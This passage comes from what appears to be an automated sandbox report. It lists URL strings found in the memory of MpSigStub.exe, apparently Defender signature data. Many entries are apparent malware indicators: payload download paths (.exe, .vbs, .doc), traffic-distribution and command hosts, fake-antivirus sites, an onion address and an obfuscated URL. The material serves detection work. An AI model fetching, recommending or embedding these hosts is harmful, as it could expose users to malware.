Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://muahangvn.blogspot.com
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://mudu.rugeh.ru
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://musah.info/
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://music.cn.yahoo.com/lyric.html?p=%s
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://music.emmigo.in/?r=wmp&title=
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://music.soso.com/q?sc=mus&w=%s
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://music.tfeed.info/?r=wmp&title=
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://muzdownload.com
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://my-save-img.ru/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://my-save-img.ru/ip2.php
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://my-speak.eu/csioj.exe
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://mybestofferstoday.com/cgi-bin/main.cgi?__rnd__
Source: MpSigStub.exe, 00000023.00000003.18342184671.0000015B1C358000.00000004.00000001.sdmp String found in binary or memory: http://mydirecttube.com/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://myip.dnsomatic.com
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://myliverpoolnews.cf/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://myplanet.group/xuxzryvq1/ind.html
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://myredir.net/K_
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://mysearchpage.biz/customizesearch.html
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://mysearchpage.biz/home.html
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://mysibrand.info/e.js
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://mysibrand.info/s.js
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://mytube.4l.cl/?id=4&watch=zryxo7
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://mytube.hs.vc/
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://myyobe.biz?
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://myyogaberry.com?
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://n5wo.lolitasexfootube.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://n7pv51t.sed.odtllc.net
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://naka4al.ru/tds/go.php?sid=1
Source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp String found in binary or memory: http://name.cnnic.
Source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp String found in binary or memory: http://name.cnnic.cn/cn.dll
Source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp String found in binary or memory: http://name.cnnic.cn/cn.dll?charset=utf-8&name=
Source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp String found in binary or memory: http://name.cnnic.cn/cn.dll?pid=
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://nameservicehosting3.in//load.php?spl=javad
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://nation.eromariaporno.net/pc/page/set_reg.php?af_code=&cuid=
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://navigation.iwatchavi.com/
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://navsmart.info
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://ncb.com.pe/media-views/pool=67/frenchclicks/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://ncccnnnc.cn/img/index.php
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp String found in binary or memory: http://netmahal.portalsepeti.com/?bd=sc&oem=ntsvc&uid=
Source: MpSigStub.exe, 00000023.00000003.18334831739.0000015B1A746000.00000004.00000001.sdmp String found in binary or memory: http://network.nocreditcard.com/DialHTML
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://network.nocreditcard.com/DialHTML/OSB/final.php3
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://network.nocreditcard.com/DialHTML/OSB/wait.php3
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://networksecurityx.hopto.org
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://nevefe.com/wp-content/themes/calliope/wp-front.php
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://nevergreen.net/456
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://new.beahh.com/startup.php
Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp String found in binary or memory: http://newglobalinternationalsewdifwefkseifodwe.duckdns.org/vbc/document.doc
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://news.7654.com/mini_new3
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://newsibrand.info/e.js
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://newsibrand.info/f2/f.js
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://newsibrand.info/s.js
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://newsystemlaunchwithnewmethodforserverfil.duckdns.org/document_v_001241.doc
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://nfinx.info
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://nh4esf33e.from-ia.com/
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://nicescroll.areaaperta.com
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://nid-help-pchange.atwebpages.com/home/web/download.php?filename=%s&key=%s
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://nid-help-pchange.atwebpages.com/home/web/post.php
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://nigera21.pansy.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://nimabi7.gnway.cc/seoul/kics/login.html
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://nmextensions.com/preconfirm.php?sid=0&aid=0&said=0
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://no.sinabc.net/abc.exe
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://novacf.org/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://nq4k.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://ns1.natalnosso.info:8082/windows.pac
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://ns33617.ovh.net/~clubregi/cartaoht.exe
Source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Errorx
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://nt010.cn/e/j.js
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://nta.hopto.org/mpa/nd.doc
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp String found in binary or memory: http://nthnuest.com:40000/tickets
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://ntlligent.info/tds/
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: http://nutricaoedesenvolvimento.com.br/i/i.sct
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://o%66%66%49%63e%2e%46%41q%53%65%72v.%43%6f%4d/%46%41%51%2e%6a%73
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://o1.o1wy.com/miss/
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://o1a.cn/Counter/NewCounter.asp?Param=
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://obscurewax.ru/joystick.js
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://ocean-v.com/wp-content/
Source: MpSigStub.exe, 00000023.00000003.18350085117.0000015B1B6E3000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://oddbods.co.uk/D6yd9x/
Source: MpSigStub.exe, 00000023.00000003.18288248948.0000015B1B1FB000.00000004.00000001.sdmp String found in binary or memory: http://offensiveware.com/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://office-archive-input.com/scan.wbk?raw=true
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://office-archives.duckdns.org/
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://office-cleaner-commander.com/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://office-cleaner-indexes.com/project.rtf
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://office-cleaner-indexes.com/update.doc
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://office-service-secs.com/blm.task
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://officefiletransferintergration.mangospot.net/..-.............................................
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://ogirikidanielifeanyi.com/wp-content/upgrade/neworder.html
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://ogp.me/ns
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://ogrc.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://old.forwart.ru/paid-invoice-credit-card-receipt/
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://omstreaming.net/omunelegende/xxx.min.js
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://on5.biz/docs/home/
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://onecs-live.azureedge.net
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://onedrivenet.xyz/work/30.vbs
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://oneprivatecloudshareandfileprotectagenci.duckdns.org/receipt/invoice_651253.doc
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://online-docu-sign-st.com/yytr.png
Source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp String found in binary or memory: http://online-game-group.ru/download.php
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://online-security-center.com/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://online-stats201.info/ur.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://online.pdf.com.tropicaldesign.com.br/)
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://online2you.org/search.php?sid=1
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://onlinesearch4meds.com
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://onlinesecuritynet.com/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://oo.shmtb.info:888/phone.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: http://opendownloadmanager.com/privacy-policy.html
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: http://openopen.usite.pro/b/
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: http://openopen.usite.pro/b/b.ico
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://openym.info/pdf/
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://opercomex.co/wp/wp-includes/images/wlw/don.html)
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://orcult.0lx.net/tcgeneration.htmg
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://os.tiviviv.com/Vittalia/
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://os.tiviviv.com/Vittalia/x
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://outfish.bounceme.net/outl.dot
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/1pyr308vbgz)
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/6gex303pfnn)
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/QoHbJ
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/gwzp304opw4)
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/gxqw308htwv)
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/qiml30afntj)
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://ow.ly/tdiy30flmvv
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://owwwc.com/mm/
Source: MpSigStub.exe, 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp String found in binary or memory: http://p.b69kq.com/
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://p.estonine.com
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://p.iask.com/p?k=%s
Source: MpSigStub.exe, 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp String found in binary or memory: http://p.k3qh4.com/
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://p.netund.com/go/
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/p?w=%s
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://p6920.cloudserver255.com/0az7vjb9jbefbkmu#########
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp String found in binary or memory: http://packetstorm.securify.com/0010-exploits/unicodexecute2.pl
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://padgettconsultants.ca/tau.gif
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp String found in binary or memory: http://pads289.net
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://page.zhongsou.com/ps?tps=2&cc=%s&aid=CA%s&w=
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://painel.moboymoboy.site/paste.php?pw=
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://pancern.scotpaker.com.br/busterinjetc.zip
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://pankus.3utilities.com/bars/banner/decipher/preparations/mxdmfq.dot
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://pantscow.ru:8080/vector_graphic.js
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://paparra.net/invoice/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://partners.sena.com/doc/inv-
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://passagensvhc.online/66.rtf
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://pastebin.com/
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://pastebin.com/raw/
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://pastebin.com/raw/L774bn1U
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://pastebin.com/raw/L774bn1Ux
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://patriciasmith.co.za/excelfolder/pdffiles)
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://patvenzklito.tk/wp/wp-includes/images/100.png
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://paufderhar07ol.ru.com/bb.html
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://pc-scan-online.com/l2.php?t=
Source: MpSigStub.exe, 00000023.00000003.18289300479.0000015B1BD55000.00000004.00000001.sdmp String found in binary or memory: http://pcmaticplus.com/success.html
Source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp String found in binary or memory: http://pcvark.com
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://setup2.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://setup3.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://setup4.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://seunelson.com.br/js/10.exe
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://seunelson.com.br/js/content.xml
Source: MpSigStub.exe, 00000023.00000003.18342184671.0000015B1C358000.00000004.00000001.sdmp String found in binary or memory: http://seuufhehfueughek.ws/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://sexfellatiomovesex.com/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000023.00000003.18327831413.0000015B1A891000.00000004.00000001.sdmp String found in binary or memory: http://sf-addon.com/helper/setup/SaveFromNetHelper-Setup.exe
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://sf3q2wrq34.ddns.net
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://sfofotky.iexam.info:8080/
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://shintorg-k.ru/errors/wpactivt.php
Source: MpSigStub.exe, 00000023.00000003.18303365623.0000015B1C05E000.00000004.00000001.sdmp String found in binary or memory: http://shop.doublepoint.net//install/uplist2.php?pid=
Source: MpSigStub.exe, 00000023.00000003.18303365623.0000015B1C05E000.00000004.00000001.sdmp String found in binary or memory: http://shop.doublepoint.net/install/p_boot.php
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://shoppingjardin.com.py/v1/wp-themes/2.php
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://show.daohang.la:5000/go/
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: http://sighttp.qq.com
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://silberlivigno.com/outstanding-invoices/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://silver13.net/java.exe
Source: MpSigStub.exe, 00000023.00000003.18290582002.0000015B1BF65000.00000004.00000001.sdmp String found in binary or memory: http://simple%-files.com
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://simplesexinc.com/file/
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://simsoshop.com/update.php?c=
Source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp String found in binary or memory: http://sindarspen.org.br/
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://sistemasagriculturagov.org/modulos
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://sitem.biz/
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://skidochuks.de.nr
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://skidware-malwrhunterteams.com/scanme.txt
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://skorohod.city/invoice-corrections-for-
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://skyfalss.ir/hacnhhy/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://skype.tom.com/download/install/sobar.exe
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://slideshowlullabies.com/plugins/content/pagenavigation/item.php)
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://slpsrgpsrhojifdij.ru/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://slpsrgpsrhojifdij.ru/krablin.exe?
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://sluzby-specjalne.cba.pl/nr26.txt
Source: MpSigStub.exe, 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp String found in binary or memory: http://smart-antivirus-2009buy.com
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=
